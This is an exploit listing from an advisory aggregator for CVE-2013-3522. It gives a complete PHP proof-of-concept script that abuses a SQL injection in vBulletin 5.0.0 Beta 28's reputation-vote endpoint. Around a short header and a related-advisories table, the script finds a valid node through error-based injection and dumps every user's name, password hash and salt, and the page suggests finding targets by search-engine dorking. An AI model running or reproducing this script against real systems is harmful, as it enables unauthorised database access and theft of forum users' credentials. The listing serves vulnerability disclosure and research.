vBulletin 5.0.0 Beta 28 SQL Injection

🗓️ 12 Mar 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 300 Views

vBulletin 5.0.0 Beta 28 is vulnerable to SQL Injection, exposing usernames and encrypted data.

Reporter	Title	Published	Views	Family All 14
0day.today	vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection	11 Dec 201300:00	–	zdt
Circl	CVE-2013-3522	25 Mar 201300:00	–	circl
Check Point Advisories	vBulletin Nodeid Parameter SQL Injection (CVE-2013-3522)	5 Jun 201400:00	–	checkpoint_advisories
CVE	CVE-2013-3522	10 May 201321:00	–	cve
Cvelist	CVE-2013-3522	10 May 201321:00	–	cvelist
Dsquare	vBulletin 5.0.0 Beta xx SQL Injection	10 Apr 201300:00	–	dsquare
Exploit DB	vBulletin 5 - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit)	11 Dec 201300:00	–	exploitdb
Metasploit	vBulletin Password Collector via nodeid SQL Injection	5 Dec 201321:58	–	metasploit
Metasploit	vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection	6 Dec 201319:50	–	metasploit
NVD	CVE-2013-3522	10 May 201321:55	–	nvd

=============================================================================================================================================
    | # Title     : vBulletin 5.0.0 Beta 28 SQL Injection vulnerability                                                                         |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.vbulletin.com/                                                                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: SQL Injection Vulnerability in vBulletin 5 Extracts Usernames and Encrypted Data
    
       (Related : https://packetstorm.news/files/id/180631/ Linked CVE numbers: CVE-2013-3522 ) .
    	
    [+] save code as poc.php.
    
    [+] Set target : line 70
    
    [+] PayLoad :
    
    <?php
    
    class VBulletinSQLiExploit {
        private $target;
        private $minNode;
        private $maxNode;
    
        public function __construct($target, $minNode = 1, $maxNode = 100) {
            $this->target = rtrim($target, '/');
            $this->minNode = $minNode;
            $this->maxNode = $maxNode;
        }
    
        private function sendRequest($data) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, "$this->target/index.php/ajax/api/reputation/vote");
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        private function doSQLi($node, $query) {
            $mark = bin2hex(random_bytes(4));
            $injection = ") AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT CONCAT('$mark', ($query), '$mark') FROM information_schema.tables LIMIT 1), FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x) a) -- ";
            
            $data = ['nodeid' => "$node$injection"];
            $res = $this->sendRequest($data);
            
            if (strpos($res, "Database error in vBulletin") !== false && preg_match("/$mark(.*?)$mark/", $res, $matches)) {
                return $matches[1];
            }
            return null;
        }
    
        private function existsNode($id) {
            return $this->doSQLi($id, "SELECT '1'") !== null;
        }
    
        private function findValidNode() {
            for ($i = $this->minNode; $i <= $this->maxNode; $i++) {
                if ($this->existsNode($i)) return $i;
            }
            return null;
        }
    
        public function exploit() {
            echo "[+] Searching for a valid node...\n";
            $node = $this->findValidNode();
            if (!$node) {
                echo "[-] No valid node found.\n";
                return;
            }
            echo "[+] Using Node ID: $node\n";
    
            $userCount = $this->doSQLi($node, "SELECT COUNT(*) FROM user");
            echo "[+] Found $userCount users.\n";
    
            for ($i = 0; $i < $userCount; $i++) {
                $username = $this->doSQLi($node, "SELECT username FROM user LIMIT $i,1");
                $password = $this->doSQLi($node, "SELECT password FROM user LIMIT $i,1");
                $salt = $this->doSQLi($node, "SELECT salt FROM user LIMIT $i,1");
                echo "[*] User: $username | Hash: $password | Salt: $salt\n";
            }
        }
    }
    
    $exploit = new VBulletinSQLiExploit("http://target.com");
    $exploit->exploit();
    
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

12 Mar 2025 00:00Current

8High risk

Vulners AI Score8

CVSS 26.5

EPSS0.56348